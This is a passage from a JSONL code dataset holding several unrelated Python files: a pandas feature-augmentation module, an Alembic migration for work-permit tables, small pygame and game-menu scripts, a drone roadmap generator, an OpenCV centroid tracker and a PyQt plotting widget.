self._error(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Illegal value for 'min_non_zero'={min_non_zero}, ignoring\")\n if 0.0 < min_non_zero and min_non_zero < 1.0:\n self.min_non_zero_count = int(min_non_zero * len(self.df))\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}, min_non_zero: {min_non_zero}, len(df): {len(self.df)}\")\n else:\n self.min_non_zero_count = int(min_non_zero)\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}\")\n self.order = namefieldparams.params.get('order')\n if self.order is None:\n self.order = DEFAULT_ORDER\n\n def should_add(self, fields, x):\n \"\"\" Should we add add these results \"\"\"\n count_non_zero = (x != 0.0).sum()\n ok = count_non_zero >= self.min_non_zero_count\n if not ok:\n self._debug(f\"Calculating {self.operation_name}, fields {fields}: Minimum number of non-zero fields is {self.min_non_zero_count}, but there are only {count_non_zero} non-zeros. Not adding column\")\n return ok\n\n\nclass DfAugmentOpNaryIncremental(FieldsParams):\n \"\"\"\n Augment dataset by adding \"N-ary operations\" between (two or more) fields (e.g. 'and') in an incremental way\n This is much more efficient when there are many new values not incorporated due to having too many zeros.\n \"\"\"\n\n def __init__(self, df, config, subsection, outputs, model_type, params=None, madatory_params=None):\n super().__init__(df, config, CONFIG_DATASET_AUGMENT, subsection, df.columns, outputs, params, madatory_params)\n self.operation_name = subsection\n self.min_non_zero_count = 1\n self.order = DEFAULT_ORDER\n\n def calc(self, namefieldparams, x):\n \"\"\"\n Calculate the operation on N fields from dataframe\n Returns: A dataframe of 'operations' (None on failure)\n \"\"\"\n self._info(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Start, name={namefieldparams.name}, params={namefieldparams.params}, fields:{namefieldparams.fields}\")\n self._op_init(namefieldparams)\n aug_dict = self.incremental_init(namefieldparams)\n if self.order < 2:\n self._error(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Order is less than 2 (order='{self.order}')\")\n return None\n for i in range(1, self.order):\n self.incremental(namefieldparams)\n df = self.get_results(namefieldparams)\n self._info(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': End, dataframe.shape: {df.shape if df is not None else '-'}\")\n return df\n\n def convert_result(self, x):\n return x.astype('float')\n\n def field_nums_to_name(self, namefieldparams, field_nums):\n \"\"\" Convert a list of field numbers to field names \"\"\"\n fields = [namefieldparams.fields[fn] for fn in field_nums]\n return f\"{namefieldparams.name}_{'_'.join(fields)}\"\n\n def get_augment_key(self, fieldnum_list):\n \"\"\" Get key for augment dictionary (indexed by field numbers) \"\"\"\n return '\\t'.join([str(i) for i in fieldnum_list])\n\n def get_results(self, namefieldparams):\n \"\"\" Get all results frmo self.augment dictionary into a dataframe \"\"\"\n results, col_names = list(), list()\n # Add all items in dict, create a list of column names\n keys = sorted(list(self.augment.keys()))\n for key in keys:\n x = self.convert_result(self.augment[key])\n results.append(x)\n col_name = self.field_nums_to_name(namefieldparams, self.augment_fieldnums[key])\n col_names.append(col_name)\n # Merge into a dataframe\n if len(results) > 0:\n df = pd.concat(results, axis=1)\n df.columns = col_names\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': DataFrame joined shape {df.shape}\")\n return df\n return None\n\n def incremental_init(self, namefieldparams):\n \"\"\" Initialize incremental dictionaries indexed by field numbers (as strings) \"\"\"\n self.augment = dict()\n self.augment_fieldnums = dict()\n for fnum in range(len(namefieldparams.fields)):\n field = namefieldparams.fields[fnum]\n self.set_augment([fnum], self.init(field))\n\n def incremental(self, namefieldparams):\n \"\"\" Incrementally add one field at a time \"\"\"\n augment = dict()\n augment_fieldnums = dict()\n count, count_added, count_skipped = 1, 0, 0\n for key in self.augment.keys():\n value = self.augment[key]\n fnlist = self.augment_fieldnums[key]\n fnmax = max(fnlist)\n fields = [namefieldparams.fields[fn] for fn in fnlist]\n # Iterate over all fields we can add. We don't want to repeat fields, so number of fields is always incrementing\n for fnum in range(fnmax + 1, len(namefieldparams.fields)):\n count += 1\n field = namefieldparams.fields[fnum]\n x = self.op_inc(value, field)\n if self.should_add(fields, field, x):\n # Add to new entry (old list of field numbers + new field number)\n count_added += 1\n fnlist_new = fnlist.copy()\n fnlist_new.append(fnum)\n key = self.get_augment_key(fnlist_new)\n augment[key] = x\n augment_fieldnums[key] = fnlist_new\n else:\n count_skipped += 1\n if count % 100 == 0:\n self._info(f\"Incremental calculation {self.operation_name}, name: '{namefieldparams.name}': Minimum non-zero: {self.min_non_zero_count}, count {count}, added {count_added}, skipped {count_skipped}, fields {fields} + {field}\")\n # Update incremental values\n self.augment = augment\n self.augment_fieldnums = augment_fieldnums\n\n def init(self, field):\n return self.df[field]\n\n def op(self, fields):\n \"\"\"\n Calculate the arithmetic operation between the two fields\n @returns A Pandas Series\n \"\"\"\n raise NotImplementedError(\"Unimplemented method, this method should be overiden by a subclass!\")\n\n def _op_init(self, namefieldparams):\n \"\"\" Initialize operations \"\"\"\n min_non_zero = namefieldparams.params.get('min_non_zero')\n if min_non_zero is not None:\n if min_non_zero < 0.0:\n self._error(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Illegal value for 'min_non_zero'={min_non_zero}, ignoring\")\n if 0.0 < min_non_zero and min_non_zero < 1.0:\n self.min_non_zero_count = int(min_non_zero * len(self.df))\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}, min_non_zero: {min_non_zero}, len(df): {len(self.df)}\")\n else:\n self.min_non_zero_count = int(min_non_zero)\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}\")\n self.order = namefieldparams.params.get('order')\n if self.order is None:\n self.order = DEFAULT_ORDER\n\n def set_augment(self, fieldnum_list, value):\n \"\"\" Set an entry in augment dictionaty (indexed by field numbers) \"\"\"\n key = self.get_augment_key(fieldnum_list)\n self.augment[key] = value\n self.augment_fieldnums[key] = fieldnum_list\n\n def should_add(self, fields, field, x):\n \"\"\" Should we add add these results \"\"\"\n count_non_zero = (x != 0.0).sum()\n ok = count_non_zero >= self.min_non_zero_count\n if ok:\n self._debug(f\"Calculating {self.operation_name}, fields {fields} + {field}: Number of non-zero fields {count_non_zero} >= {self.min_non_zero_count}, OK\")\n else:\n self._debug(f\"Calculating {self.operation_name}, fields {fields} + {field}: Minimum number of non-zero fields is {self.min_non_zero_count}, but there are only {count_non_zero} non-zeros. Not adding column\")\n return ok\n\n\nclass DfAugmentOpAdd(DfAugmentOpNary):\n \"\"\" Augment dataset by adding two or more fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'add', outputs, model_type, params=['min_non_zero', 'order'])\n\n def op(self, fields):\n \"\"\" Calculate the arithmetic operation between the two or more fields \"\"\"\n return self.df[fields].sum(axis=1)\n\n\nclass DfAugmentOpAnd(DfAugmentOpNaryIncremental):\n \"\"\" Augment dataset by performing 'and' of two or more fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'and', outputs, model_type, params=['min_non_zero', 'order', 'threshold'])\n\n def init(self, field):\n return self.df[field] > self.threshold\n\n def _op_init(self, namefieldparams):\n super()._op_init(namefieldparams)\n self.threshold = namefieldparams.params.get('threshold')\n if self.threshold is None:\n self.threshold = 0.0\n\n def op_inc(self, x, field):\n \"\"\" Calculate the (incremental) 'and' operation between the a value and a field \"\"\"\n return x & (self.df[field] > self.threshold)\n\n\nclass DfAugmentOpDiv(DfAugmentOpBinary):\n \"\"\" Augment dataset by dividing two fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'div', outputs, model_type, params=['min_non_zero'])\n\n def can_apply_second(self, field):\n \"\"\" We apply this operation only if all numbers in the second field are non-zero \"\"\"\n return (self.df[field] != 0).all()\n\n def op(self, field_i, field_j):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n return self.df[field_i] / self.df[field_j]\n\n\nclass DfAugmentOpLogRatio(DfAugmentOpBinary):\n \"\"\" Augment dataset by applying the log ratio of two fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'log_ratio', outputs, model_type, params=['base', 'min_non_zero'])\n\n def can_apply_first(self, field):\n \"\"\" We apply this operation if all numbers in the first field are positive \"\"\"\n return (self.df[field] > 0).all()\n\n def can_apply_second(self, field):\n \"\"\" We apply this operation if all numbers in the second field are positive \"\"\"\n return (self.df[field] > 0).all()\n\n def op(self, field_i, field_j):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n return (np.log(self.df[field_i]) - np.log(self.df[field_j])) / self.log_base\n\n def _op_init(self, namefieldparams):\n \"\"\" Initialize operations \"\"\"\n super()._op_init(namefieldparams)\n base = namefieldparams.params.get('base')\n self.log_base = _parse_base(base)\n self._debug(f\"Log base is '{base}', setting log_base={self.log_base}\")\n\n\nclass DfAugmentOpLogPlusOneRatio(DfAugmentOpBinary):\n \"\"\" Augment dataset by applying the log+1 ratio of two fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'logp1_ratio', outputs, model_type, params=['base', 'min_non_zero'])\n\n def can_apply_first(self, field):\n \"\"\" We apply this operation if all numbers in the first field are non-negative \"\"\"\n return (self.df[field] >= 0).all()\n\n def can_apply_second(self, field):\n \"\"\" We apply this operation if all numbers in the second field are non-negative \"\"\"\n return (self.df[field] >= 0).all()\n\n def op(self, field_i, field_j):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n n = np.log(self.df[field_i] + 1)\n d = np.log(self.df[field_j] + 1)\n return (n - d) / self.log_base\n\n def _op_init(self, namefieldparams):\n \"\"\" Initialize operations \"\"\"\n super()._op_init(namefieldparams)\n base = namefieldparams.params.get('base')\n self.log_base = _parse_base(base)\n self._debug(f\"Log base is '{base}', setting log_base={self.log_base}\")\n\n\nclass DfAugmentOpMult(DfAugmentOpNary):\n \"\"\" Augment dataset by multiplying two or more fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'mult', outputs, model_type, params=['min_non_zero', 'order'])\n\n def op(self, fields):\n \"\"\" Calculate the arithmetic operation between the two or more fields \"\"\"\n return self.df[fields].prod(axis=1)\n\n\nclass DfAugmentOpSub(DfAugmentOpBinary):\n \"\"\" Augment dataset by substracting two fields \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, 'sub', outputs, model_type, params=['min_non_zero'])\n\n def op(self, field_i, field_j):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n return self.df[field_i] - self.df[field_j]\n\n\nclass DfAugmentNmf(FieldsParams):\n \"\"\" Augment dataset by adding Non-negative martix factorization \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, CONFIG_DATASET_AUGMENT, 'nmf', df.columns, outputs, params=['min_non_zero', 'num'], madatory_params=['num'])\n self.sk_nmf_by_name = dict()\n\n def calc(self, namefieldparams, x):\n \"\"\"Calculate 'num' NMFs using 'fields' from dataframe\n Returns: A dataframe of NMFs (None on failure)\n \"\"\"\n self._debug(f\"Calculating NMF: Start, name={namefieldparams.name}, num={namefieldparams.number}, fields:{namefieldparams.fields}\")\n nmf = NMF(n_components=namefieldparams.number)\n nmf.fit(x)\n self.sk_nmf_by_name[namefieldparams.name] = nmf\n xnmf = nmf.transform(x)\n self._debug(f\"Calculating NMF: End\")\n cols = self.get_col_names_num(namefieldparams, xnmf)\n return self.array_to_df(xnmf, cols)\n\n\nclass DfAugmentPca(FieldsParams):\n \"\"\" Augment dataset by adding principal components \"\"\"\n\n def __init__(self, df, config, outputs, model_type):\n super().__init__(df, config, CONFIG_DATASET_AUGMENT, 'pca', df.columns, outputs, params=['num'], madatory_params=['num'])\n self.sk_pca_by_name = dict()\n\n def calc(self, namefieldparams, x):\n \"\"\"Calculate 'num' PCAs using 'fields' from dataframe\n Returns: A dataframe of PCAs (None on failure)\n \"\"\"\n num = namefieldparams.params['num']\n self._debug(f\"Calculating PCA: Start, name={namefieldparams.name}, num={num}, fields:{namefieldparams.fields}\")\n if x.isnull().sum().sum() > 0:\n cols_na = x.isnull().sum(axis=0) > 0\n self._fatal_error(f\"Calculating PCA: There are NA values in the inputs, columns: {list(x.columns[cols_na])}\")\n pca = PCA(n_components=num)\n pca.fit(x)\n self.sk_pca_by_name[namefieldparams.name] = pca\n xpca = pca.transform(x)\n self._debug(f\"Calculating PCA: End\")\n cols = self.get_col_names_num(namefieldparams, xpca)\n return self.array_to_df(xpca, cols)\n","sub_path":"src/logml/datasets/df/df_augment.py","file_name":"df_augment.py","file_ext":"py","file_size_in_byte":27597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"229578111","text":"\"\"\"empty message\n\nRevision ID: 2a0568298c51\nRevises: 4645bbe9dadf\nCreate Date: 2016-07-11 17:35:53.263437\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2a0568298c51'\ndown_revision = '4645bbe9dadf'\n\nfrom alembic import op\nimport sqlalchemy as sa\nimport geoalchemy2\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('work_permits',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('date_created', sa.DateTime(), nullable=True),\n sa.Column('date_modified', sa.DateTime(), nullable=True),\n sa.Column('requestor_user_id', sa.Integer(), nullable=False),\n sa.Column('approver_user_id', sa.Integer(), nullable=False),\n sa.Column('type', sa.String(), nullable=False),\n sa.Column('location', sa.String(), nullable=False),\n sa.Column('coordinates', geoalchemy2.types.Geometry(geometry_type='POINT'), nullable=True),\n sa.Column('start_datetime', sa.DateTime(), nullable=True),\n sa.Column('end_datetime', sa.DateTime(), nullable=True),\n sa.Column('job_description_summary', sa.Text(), nullable=True),\n sa.Column('status', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['approver_user_id'], ['users.id'], ),\n sa.ForeignKeyConstraint(['requestor_user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('work_permit_hazards',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('date_created', sa.DateTime(), nullable=True),\n sa.Column('date_modified', sa.DateTime(), nullable=True),\n sa.Column('permit_id', sa.Integer(), nullable=False),\n sa.Column('hazard_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['hazard_id'], ['hazards.id'], ),\n sa.ForeignKeyConstraint(['permit_id'], ['work_permits.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('work_permit_steps',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('date_created', sa.DateTime(), nullable=True),\n sa.Column('date_modified', sa.DateTime(), nullable=True),\n sa.Column('permit_id', sa.Integer(), nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.ForeignKeyConstraint(['permit_id'], ['work_permits.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('work_permits')\n op.drop_table('work_permit_steps')\n op.drop_table('work_permit_hazards')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/2a0568298c51_.py","file_name":"2a0568298c51_.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"359222404","text":"import forca\r\nimport adiviha\r\n\r\ndef escolhe_jogo():\r\n print(\"**\" * 20)\r\n print(\"***********ESCOLHA UM JOGO!!************\")\r\n print(\"**\" * 20)\r\n\r\n print(\"adivinhação (1), Forca(2)\")\r\n jogo = int(input(\"E então qual vai ser\"))\r\n\r\n if jogo == 1:\r\n print(\"jogando Adivinhação\")\r\n adiviha.jogar()\r\n elif jogo == 2:\r\n print(\"jogando Forca\")\r\n forca.jogar()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n escolhe_jogo()","sub_path":"joguinhos/jogos.py","file_name":"jogos.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104534356","text":"from datetime import timedelta\n\nfrom airflow.utils.decorators import apply_defaults\n\nfrom presidio.operators.fixed_duration_jar_operator import FixedDurationJarOperator\n\n\nclass SmartModelAccumulateOperator(FixedDurationJarOperator):\n \"\"\"\n Runs a accumulate aggregations task (a JAR file) for aggregation events model building, using a bash command.\n The c'tor accepts the task arguments that are constant throughout the\n operator runs (e.g. the fixed duration strategy and the data source).\n Other arguments, such as the start date and the end date, are evaluated before every run.\n \"\"\"\n\n @apply_defaults\n def __init__(self, fixed_duration_strategy, command, smart_events_conf, task_id=None, *args, **kwargs):\n \"\"\"\n C'tor.\n :param fixed_duration_strategy: The duration covered by the feature bucket aggregations (currently only daily)\n :type fixed_duration_strategy: timedelta\n :param smart_events_conf: The smart event conf to do the accumulation on\n :type smart_events_conf: string\n :param task_id: The task ID of this operator - If None, the ID is generated automatically\n :type task_id: string\n \"\"\"\n\n self._smart_events_conf = smart_events_conf\n self.task_id = task_id or '{}_{}'.format(\n self._smart_events_conf,\n self.get_task_name()\n )\n\n java_args = {\n 'smart_record_conf_name': self._smart_events_conf,\n }\n\n super(SmartModelAccumulateOperator, self).__init__(\n task_id=self.task_id,\n fixed_duration_strategy=fixed_duration_strategy,\n command=command,\n java_args=java_args,\n *args,\n **kwargs\n )\n\n def get_task_name(self):\n \"\"\"\n :return: The task name\n \"\"\"\n return 'smart_model_accumulation'\n\n","sub_path":"presidio-core/presidio-workflows/presidio/operators/model/smart_model_accumulate_operator.py","file_name":"smart_model_accumulate_operator.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"16139438","text":"import argparse\nimport time\nimport msgpack\nfrom enum import Enum, auto\n\nimport numpy as np\n\nfrom planning_utils import a_star, heuristic, create_grid , probabilistic_a_star\nfrom udacidrone import Drone\nfrom udacidrone.connection import MavlinkConnection\nfrom udacidrone.messaging import MsgID\nfrom udacidrone.frame_utils import global_to_local\n\nimport math\nfrom bresenham import bresenham\n\nTARGET_ALTITUDE = 5\nSAFETY_DISTANCE = 5\n\nSAMPLE_NUMBER =35\n\ndata = np.loadtxt('colliders.csv', delimiter=',', dtype='Float64', skiprows=2) \ngrid, north_offset, east_offset = create_grid(data, TARGET_ALTITUDE, SAFETY_DISTANCE)\n\nprint(\"random x\" , np.random.choice(grid.shape[0],SAMPLE_NUMBER))\nprint(\"random y\" , np.random.choice(grid.shape[1],SAMPLE_NUMBER))\n\n\nprint(\"Generating random points\")\nrandom_points = [ (x,y) for x in np.random.choice(grid.shape[0],SAMPLE_NUMBER) for y in np.random.choice(grid.shape[1],SAMPLE_NUMBER)]\n\nprint(\"random_points = \",random_points)\nprint(\"length of random_points = \",len(random_points))\n\nprint(\"Filtering to free space points\")\nfree_space_random_points = [ p for p in random_points if grid[p[0],p[1]] == 0 ]\nprint(\"free_space_random_points = \" , free_space_random_points)\nprint(\"length of free_space_random_points = \" , len(free_space_random_points)) \n\nprint(\"Generating valid actions map\")\nvalid_actions_map ={}\nfor p in free_space_random_points:\n valid_actions_map[p] = []\n\nfor p in free_space_random_points:\n for q in free_space_random_points:\n if p != q:\n pathClear = True\n cells = list(bresenham(p[0], p[1], q[0], q[1]))\n for cell in cells:\n if grid[ cell[0],cell[1] ] == 1:\n pathClear = False\n break\n if pathClear:\n valid_actions_map[p].append( [ q[0]-p[0] , q[1]-p[1] , np.sqrt( (q[0]-p[0])**2 + (q[1]-p[1])**2 ) ] )\n\n\nprint(free_space_random_points)\nprint(valid_actions_map)\n\n\nimport pickle\n\nf = open(\"free_space_random_points.pkl\",\"wb\")\npickle.dump(free_space_random_points,f)\nf.close()\n\n\nf = open(\"valid_actions_map.pkl\",\"wb\")\npickle.dump(valid_actions_map,f)\nf.close()","sub_path":"probabilistic_roadmap_generator.py","file_name":"probabilistic_roadmap_generator.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151395878","text":"import time\nimport random\n\nimport pygame\n\nfrom aux import *\nfrom carro import Car\nfrom bloco import Block\nfrom pontuacao import Score\n\n\npygame.init()\n\n###############################################################################\n# Tela Inicial\n###############################################################################\ndef game_start():\n intro = True\n\n while intro:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_RETURN:\n intro = False\n game_loop()\n\n\n gameDisplay.fill(gray)\n largeText = pygame.font.Font('freesansbold.ttf',115)\n \n TextSurf, TextRect = text_objects(\"Press Start\", largeText, white)\n TextRect.center = ((DISPLAY_WIDTH/2),(DISPLAY_HEIGHT/2))\n \n gameDisplay.blit(TextSurf, TextRect)\n\n pygame.display.update()\n clock.tick(15)\n\n\n###############################################################################\n# Loop\n###############################################################################\ndef game_loop():\n\n # cria carro\n car = Car(x = DISPLAY_WIDTH*0.45,\n y = DISPLAY_HEIGHT*0.8, \n width = 100, \n img = carImg)\n\n # cria bloco\n block = Block(x = random.randrange(0, DISPLAY_WIDTH), \n y = -DISPLAY_HEIGHT, \n width = 100, \n height = 100, \n color = random_color(), \n speed = 10) \n \n # cria ponto\n score = Score(score=0)\n\n while True:\n # background\n gameDisplay.fill(gray)\n\n # tratamento dos eventos \n for event in pygame.event.get():\n # quit\n if event.type == pygame.QUIT:\n pygame.quit()\n quit() \n \n # botao foi pressionado\n if event.type == pygame.KEYDOWN:\n # esquerda\n if event.key == pygame.K_LEFT:\n car.dx = -10\n # direita\n elif event.key == pygame.K_RIGHT:\n car.dx = 10\n\n # botao foi solto\n if event.type == pygame.KEYUP:\n # esquerda ou direia\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n car.dx = 0\n\n # atualiza bloco\n if block.update():\n block.draw()\n else:\n game_start()\n\n # atualiza carro\n if car.update(block):\n car.draw()\n else:\n game_start()\n\n # atualiza placar\n if score.update(block):\n score.draw()\n else:\n game_start()\n \n # atualiza a tela\n pygame.display.update()\n\n clock.tick(60)\n\n\nif __name__ == \"__main__\":\n game_start()\n\n pygame.quit()\n quit()","sub_path":"2ele031/lab/lab3/src/jogo_final/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"7892106","text":"import cv2\nfrom time import perf_counter as pc\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_AUTO_EXPOSURE, 0.25)\ncap.set(cv2.CAP_PROP_AUTO_EXPOSURE, -7)\n\n# MOG - has some noise\nfgbg = cv2.bgsegm.createBackgroundSubtractorMOG()\n\n# GMG - removes noise, slower.\nkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3,3))\nfgbg_gmg = cv2.bgsegm.createBackgroundSubtractorGMG()\n\nwhile True:\n start = pc()\n _, frame = cap.read()\n\n # fg_mask_mog = fgbg.apply(frame) # 8 ms\n\n fg_mask_gmg = fgbg_gmg.apply(frame) # 35 ms\n fg_mask_gmg = cv2.morphologyEx(fg_mask_gmg, cv2.MORPH_OPEN, kernel)\n\n # convert the grayscale image to binary image\n _, thresh = cv2.threshold(fg_mask_gmg,127,255,0)\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n for c in contours:\n # calculate moments for each contour\n M = cv2.moments(c)\n\n # calculate x,y coordinate of center\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n cv2.circle(frame, (cX, cY), 5, (255, 255, 255), -1)\n cv2.putText(frame, \"centroid\", (cX - 25, cY - 25),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)\n\n\n cv2.imshow(\"frame\", frame)\n # cv2.imshow(\"fg_mask_mog\", fg_mask_mog)\n # cv2.imshow(\"fg_mask_gmg\", fg_mask_gmg)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n length = int((pc() - start) * 1000) # sec to millis\n print(f\"{length} ms\")\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"centroid-bee-swarm.py","file_name":"centroid-bee-swarm.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273213388","text":"# -*- encoding: utf-8 -*-\n\nimport PyQt4.QtCore as QtCore\nfrom PyQt4.Qt import *\n\nfrom src.base.baseplotwidget import BasePlotWidget\nfrom src.base.baselines import Line, FuncLine\nfrom src.base.baseplot import BaseDataPlot\nfrom src.linesinfo import InfoLinesView, InfoMarkersView\n\n\nclass DataPlot(BaseDataPlot):\n\n def __init__(self, parent=None):\n super(DataPlot, self).__init__(parent)\n\n self.lineUData = None # напряжения с последнего измерения\n self.lineAData = None # устредненное напряжение за M измерений\n self.lineRefData = None # эталонный сигнал\n\n\n self.list_functions = []\n\n return\n\n def drawLineOfFunction(self, text_func, points_cnt=1000, color=None, legend=\"\"):\n '''\n Рисует на холсте график функции\n :param text_func:\n :param points_cnt:\n :param color:\n :param legend:\n :return:\n '''\n line = FuncLine(self)\n line.drawInit(text_func, points_cnt=points_cnt, color=color, legend=legend)\n line.drawOn()\n self.list_functions.append(line)\n\n def drawRandomLine(self):\n '''\n Рисует случайную линию по формуле.\n :return:\n '''\n random_name = \"Random name %s\" % (len(self.list_functions) + 1)\n line = FuncLine(self)\n line.drawInit(\"math.sin(random.random() ** 2 * math.pi * x) * random.random() * 2.0 \",\n color=self._randomColor(), legend=random_name)\n line.drawOn()\n self.list_functions.append(line)\n\n @QtCore.pyqtSlot()\n def updateData(self):\n '''\n Обновляет все графики исходя из новых вхо��ных данных\n :return:\n '''\n\n def updateLine(line, data_x, data_y, self):\n if line is None:\n line = Line(self)\n line.setDataAndUpdate(data_x, data_y)\n else:\n line.setDataAndUpdate(data_x, data_y)\n return line\n\n if not self.is_pause:\n parent = self.parent()\n\n data1 = parent.getTData()\n data2 = parent.getUData()\n data3 = parent.getAData()\n data4 = parent.getRefData()\n\n # напряжения с последнего измерения\n self.lineUData = updateLine(self.lineUData, data1, data2[1], self)\n\n # устредненное напряжение за M измерений\n self.lineAData = updateLine(self.lineAData, data1, data3[1], self)\n\n # эталонный сигнал\n self.lineRefData = updateLine(self.lineRefData, data1, data4[1], self)\n\n for fu in self.list_functions:\n fu.redraw()\n else:\n pass\n\n @QtCore.pyqtSlot()\n def setPause(self):\n self.is_pause = not self.is_pause\n\n @QtCore.pyqtSlot()\n def zoomOff(self):\n self.clearZoomStack()\n\n @QtCore.pyqtSlot()\n def drawDefaultLines(self):\n # self.drawLineOfFunction(\"x ** 2\")\n self.drawLineOfFunction(\"x\")\n self.drawLineOfFunction(\"-x\")\n self.drawLineOfFunction(\"2 * math.pi * x\")\n self.drawLineOfFunction(\"4 * math.pi * x\")\n\n\nclass PlotWidget(BasePlotWidget):\n '''\n Предполагается, что каждому PlotWidget соответствует только один Plot\n '''\n\n def __init__(self, parent=None):\n self.plot = DataPlot()\n BasePlotWidget.__init__(self, parent, self.plot)\n\n buttonMaxWidth = 200\n quitPB = QPushButton('Close')\n quitPB.setMaximumWidth(buttonMaxWidth)\n zoomPB = QPushButton('Zoom off')\n zoomPB.setMaximumWidth(buttonMaxWidth)\n defaultPB = QPushButton('Default')\n defaultPB.setMaximumWidth(buttonMaxWidth)\n\n pausePB = QPushButton('Pause')\n pausePB.setCheckable(True)\n pausePB.setMaximumWidth(buttonMaxWidth)\n\n\n self.h_layout_left = QVBoxLayout()\n self.v_layout = QHBoxLayout()\n self.v_layout_right = QVBoxLayout()\n\n\n self.h_layout_left.addWidget(zoomPB)\n self.h_layout_left.addWidget(pausePB)\n # self.h_layout.addWidget(defaultPB)\n\n self.h_layout_left.addWidget(QSplitter())\n self.h_layout_left.addWidget(quitPB)\n\n\n self.h_layout_left.setSizeConstraint(QLayout.SetMinimumSize)\n\n\n self.info_lines = InfoLinesView(self.plot)\n\n self.info_markers = InfoMarkersView(self.plot)\n self.v_layout_right.addWidget(self.info_lines)\n self.v_layout_right.addWidget(self.info_markers)\n\n self.v_layout_right.setSizeConstraint(QLayout.SetDefaultConstraint)\n\n\n self.v_layout.addLayout(self.h_layout_left)\n self.v_layout.addWidget(self.plot)\n self.v_layout.addLayout(self.v_layout_right)\n\n\n self.setLayout(self.v_layout)\n\n self.connect(pausePB, QtCore.SIGNAL('clicked()'), self.plot, QtCore.SLOT('setPause()'))\n self.connect(zoomPB, QtCore.SIGNAL('clicked()'), self.plot, QtCore.SLOT('zoomOff()'))\n self.connect(quitPB, QtCore.SIGNAL('clicked()'), qApp, QtCore.SLOT('quit()'))\n self.connect(defaultPB, QtCore.SIGNAL('clicked()'), self.plot, QtCore.SLOT('drawDefaultLines()'))\n\n\n\n\n\n","sub_path":"src/plotwidget.py","file_name":"plotwidget.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374806405","text":"from pyh import *\ndef tablecss(self,table = None,width='90%'):\n\ttable.attributes['cellSpacing'] = 1;\n\ttable.attributes['cellPadding'] = 1;\n\ttable.attributes['border'] = 1;\n\ttable.attributes['borderColor'] = '#666666';\n\ttable.attributes['width'] = width;\n #set colum title bgcolor \ndef tr_title_css(self,tr = None):\n\ttr.attributes['bgcolor'] = '#CCCC00';\n\n#get summary info\ndef 